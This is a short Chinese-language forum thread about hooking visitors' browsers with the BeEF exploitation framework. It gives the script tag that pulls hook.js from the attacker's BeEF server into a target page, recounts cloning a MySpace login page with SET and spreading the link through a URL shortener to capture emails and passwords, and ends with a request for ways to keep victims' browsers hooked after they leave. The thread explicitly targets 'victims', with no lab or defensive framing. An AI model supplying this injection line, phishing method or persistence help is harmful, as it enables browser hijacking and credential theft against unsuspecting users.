我需要知道如何将 BeEF 挂钩设置到我喜欢的页面(现有网页或新的自定义页面)。我尝试共享演示页面,但仅适用于托管计算机。我寻找过教程但没有找到。请帮忙!
我很确定您必须将 hook.html 文件托管在托管服务上,然后将受害者引导到那里。还需要编辑yml文件。 我记得在 myspace 时代你可以上 backtrack_r3, 加载 setoolset 并克隆 myspace。
然后您将该文件上传到文件主机服务上。在链接缩短器中使用该链接发布一个愚蠢的帖子。然后你就有了电子邮件和密码。
使用beef-xss你可以生成hook.js。 假设目标导航网页 target.html,您应在该页面中包含:
<script src="http://<beef-xss-ip-address>:<beef-xss-port>/hook.js"></script>
一旦你的目标加载了 target.html ,它将被 Beef-xss 工具挂钩,你将能够枚举它。
我正在寻找一种先进的方法,即使在用户关闭或离开我们引导他进行持久性的网页后,也能保持浏览器的钩子状态